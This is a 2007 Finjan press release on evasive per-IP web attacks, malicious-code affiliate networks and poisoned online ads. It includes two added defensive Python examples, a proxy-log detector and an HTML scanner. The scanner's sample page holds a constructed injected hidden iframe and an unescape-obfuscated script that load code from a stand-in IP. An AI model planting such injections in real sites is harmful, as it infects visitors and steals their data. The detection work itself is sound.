San Jose, CA / Finjan, a leader in web security products, today released its Web Security Trends Report (Q2 2007), which focuses on a new genre of highly sophisticated and evasive attacks designed to potentially bypass signature-based and database-reliant security technology. The report also describes the proliferation of affiliation networks based on a “hosted model” for malicious code, which utilize off-the-shelf malicious code packages to compromise highly popular websites and even government domains. Also following on from the trend revealed in Finjan’s Q1 report, new examples show the growing presence of malicious code in online advertising on legitimate websites.

Evasive Attacks Cover Their Tracks to Avoid Detection

Recent findings by Finjan reveal that hackers have created a new class of highly evasive attacks. These attacks represent a quantum leap in terms of their technological sophistication, going far beyond drive-by downloads and code obfuscation. In order to minimize the malicious code’s window of exposure, evasive attacks keep track of the actual IP addresses of visitors to a particular website or web page. Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address. This means that the second time a given IP address tries to access the malicious page, a benign page will be automatically displayed in its place. All traces of the initial malicious page completely disappear. The report provides examples of evasive attacks, along with the actual code used by the hacker to run them.

“Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious code’s exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category,” said Yuval Ben-Itzhak, CTO, Finjan. “The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected.”
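The “single view per IP” behaviour described above leaves a characteristic trace in an organisation’s own proxy logs: for a given URL, each client’s first response differs from every later response, and the switch is consistent across clients. The following detector, an added example that is not code from the report or from Finjan, runs that check over a constructed proxy log excerpt. The log format, the hostnames (example.test) and the short digests standing in for response-body hashes are all assumptions; a real deployment would compute the digest from the captured body.

```python
from collections import defaultdict

# Constructed proxy log excerpt (not taken from the report). One record per line:
#   <timestamp> <client_ip> <url> <digest_of_response_body>
# The digests are made-up labels standing in for real body hashes.
SAMPLE_LOG = """\
2007-06-01T10:00:01 10.0.0.5 http://example.test/promo.html 9e1f3a
2007-06-01T10:00:02 10.0.0.5 http://example.test/news.html 4b77c1
2007-06-01T10:00:40 10.0.0.5 http://example.test/promo.html 07d2ee
2007-06-01T10:01:10 10.0.0.9 http://example.test/promo.html 9e1f3a
2007-06-01T10:01:12 10.0.0.9 http://example.test/news.html 4b77c1
2007-06-01T10:01:50 10.0.0.9 http://example.test/promo.html 07d2ee
2007-06-01T10:02:05 10.0.0.7 http://example.test/promo.html 9e1f3a
2007-06-01T10:02:30 10.0.0.5 http://example.test/ticker.html a1
2007-06-01T10:02:31 10.0.0.5 http://example.test/ticker.html b2
2007-06-01T10:02:32 10.0.0.9 http://example.test/ticker.html c3
2007-06-01T10:02:33 10.0.0.9 http://example.test/ticker.html d4
2007-06-01T10:03:00 10.0.0.5 http://example.test/news.html 4b77c1
"""


def parse_log(text):
    """Parse the assumed log format into (timestamp, client_ip, url, digest) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, ip, url, digest = line.split()
        records.append((ts, ip, url, digest))
    return records


def find_one_view_per_ip_urls(records, min_clients=2):
    """Return URLs whose responses follow the 'malicious once, benign afterwards' pattern.

    A URL is flagged only when, for at least `min_clients` clients that fetched it
    more than once, every client's first response shared one digest, every later
    response shared a single different digest, and the two never overlap.  Static
    pages (same digest always) and genuinely dynamic pages (digests vary per
    request) do not match, which keeps the false-positive rate down.
    """
    views = defaultdict(lambda: defaultdict(list))  # url -> client_ip -> digests in order
    for ts, ip, url, digest in sorted(records):  # ISO timestamps sort lexically
        views[url][ip].append(digest)

    flagged = {}
    for url, per_ip in views.items():
        repeat_clients = {ip: d for ip, d in per_ip.items() if len(d) >= 2}
        if len(repeat_clients) < min_clients:
            continue
        first_views = {d[0] for d in repeat_clients.values()}
        later_views = {h for d in repeat_clients.values() for h in d[1:]}
        if len(first_views) == 1 and len(later_views) == 1 and first_views.isdisjoint(later_views):
            flagged[url] = {
                "first_view": next(iter(first_views)),
                "later_views": next(iter(later_views)),
                "clients": sorted(repeat_clients),
            }
    return flagged


if __name__ == "__main__":
    for url, info in find_one_view_per_ip_urls(parse_log(SAMPLE_LOG)).items():
        print(url, info)
```

The check only sees what the proxy already served, so it complements rather than replaces a second fetch from a different vantage point: the per-country and crawler-aware gating in the quote above would need a comparison between what the organisation’s clients received and what a scanner received from elsewhere.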

Driven by strong financial incentives and using widely available malicious code software packages, “affiliations” are being created that promote infections using a “hosted” model for the malicious code. In this scheme, the malicious code is usually located on a dedicated malicious code server (or a site that has been hacked to host the malicious code), while the participants in the affiliation insert a reference to the malicious code in various websites. The website owners are paid according to the number of infected visitors to the site. Finjan’s findings attest to the growing magnitude of these affiliation networks, which have been used to compromise highly popular websites and even government domains. Trojan keylogger log files show that the malicious code is being used to steal sensitive financial and personal information, such as bank account details, credit card numbers and social security IDs, for which e-criminals are willing to pay top dollar. The report includes statistics and maps showing how a single malicious code server operated by just one hacker has infected thousands of legitimate websites worldwide. Since hundreds of hackers are already using this technique, the problem is already global in scale.

“Many sites are getting hit by stealthy attacks that leave no visible damage and simply insert a line of HTML code that points to malicious code on an external server,” stated Ben-Itzhak. “The upshot is that any visitor to such a website may be jeopardizing his/her personal identity, bank account details and credit card numbers to the e-criminals behind these operations. Business users that rely solely on signature-based anti-virus or URL filtering solutions might be left vulnerable to these types of attacks.”

Malicious Code in Online Advertising

A follow-up study conducted by Finjan’s MCRC has shed additional light on the growing presence of malicious code in online advertising. As websites depend more on advertising revenues, they often display ads from third party advertising networks, over which they may have little or no control. While legitimate website owners trust advertisers to display non-malicious content, advertisers sometimes “sublet” their space to others. This hierarchy can often comprise several layers, seriously compromising the level of control the website owner has over advertising content. The report includes a detailed analysis of an innocent blog site that deploys keyword-based advertisements that are placed automatically from an ad server. However, Finjan found that the ad content also included obfuscated references to malicious code on a third site that uses multiple infection techniques to download a Trojan keylogger to the user’s machine. Another recent example of this trend was a banner ad hiding code with the ANI exploit that was unknowingly being hosted on one of the most popular techie websites.

“As commercially-motivated hackers look for ways to reach the widest possible audience in the shortest possible time, advertising has become a prime target for malicious code,” stated Ben-Itzhak. “By targeting high-volume websites which are generally considered “trusted” by most URL filtering products, hackers can achieve higher infection rates and earn more money.”
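Both the affiliation scheme (a single injected line of HTML pointing at an external malicious code server) and the advertising chain (third-party ad content carrying obfuscated references to a further site) reduce, from the site owner’s side, to content that references hosts the owner does not control. The scanner below is an added example, not code from the report or from Finjan; it walks a page’s HTML and reports script, iframe, embed and object references to hosts outside an allowlist, iframes styled to be invisible, and inline scripts that build markup through `document.write` with `unescape` or `fromCharCode`. The page, the trusted-host list, the ad-network host and the 203.0.113.10 address are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: hosts the site owner controls and expects to see referenced.
TRUSTED_HOSTS = {"www.example.test", "static.example.test"}

# Constructed page (not from the report): a blog that embeds a keyword ad script,
# plus the two kinds of injected content the text describes.
SAMPLE_HTML = """\
<html><body>
<script src="/js/site.js"></script>
<script src="http://ads.adnetwork.test/serve.js?kw=security"></script>
<p>Welcome to the blog.</p>
<iframe src="http://203.0.113.10/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://203.0.113.10/x.js%22%3E%3C/script%3E'));</script>
</body></html>
"""


class ExternalRefScanner(HTMLParser):
    """Collect references to untrusted hosts and other injection indicators."""

    LOADER_TAGS = ("script", "iframe", "embed", "object")

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = set(trusted_hosts)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        if tag in self.LOADER_TAGS:
            src = a.get("src") or a.get("data")
            if src:
                self._check_reference(tag, src, a)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data verbatim; look for the
        # classic obfuscated writer pattern rather than trying to decode it.
        if self._in_script and "document.write" in data and (
            "unescape(" in data or "fromCharCode(" in data
        ):
            self.findings.append({"tag": "script", "src": None,
                                  "reasons": ["obfuscated inline document.write"]})

    def _check_reference(self, tag, src, a):
        host = urlparse(src).hostname
        if host is None:
            return  # relative URL: same origin as the page
        reasons = []
        if host not in self.trusted:
            reasons.append("external host %s" % host)
        if tag == "iframe" and self._looks_hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append({"tag": tag, "src": src, "reasons": reasons})

    @staticmethod
    def _looks_hidden(a):
        style = (a.get("style") or "").replace(" ", "").lower()
        return (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                or "display:none" in style or "visibility:hidden" in style)


def scan_html(html, trusted_hosts):
    """Return the list of findings for one page, in document order."""
    scanner = ExternalRefScanner(trusted_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML, TRUSTED_HOSTS):
        print(finding)
```

Run against a site owner’s own pages on a schedule, a scanner like this turns the “stealthy attack that leaves no visible damage” into a diff: any reference that was not there at the last run, and any host that is not on the list, is worth a look. The ad-network reference is reported too, not because it is malicious, but because it is exactly the layer of the hierarchy the owner does not control and should therefore track.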

Parting Advice

Finjan’s research confirms that attempts to pattern malicious code and create signatures, or to categorize known malicious sites, are clearly “too little, too late” when it comes to providing adequate protection to today’s dynamic and evasive web threats. “There are no second chances when it comes to safeguarding users’ personal details and securing confidential corporate information. The way to detect modern malicious code is to be able to understand in real-time what the code intends to do, before it does it,” concludes Ben-Itzhak.

Finjan offers the following advice for corporate users:

Make sure that real-time inspection and protection is added to your web security solution. Chasing the attack vectors after the event is always “too little, too late”, particularly if you get hit by a zero day attack that your security solution does not recognize.

Make sure that your security solution is updated to handle new technologies and trends. Security products should protect you from the vulnerabilities rather than just attacks and exploits.

Check your vendor’s research capabilities and their ability to provide up-to-date information which is immediately translated into actionable security measures.

Examine your egress data policy to make sure that you cover all known and suspicious sites.
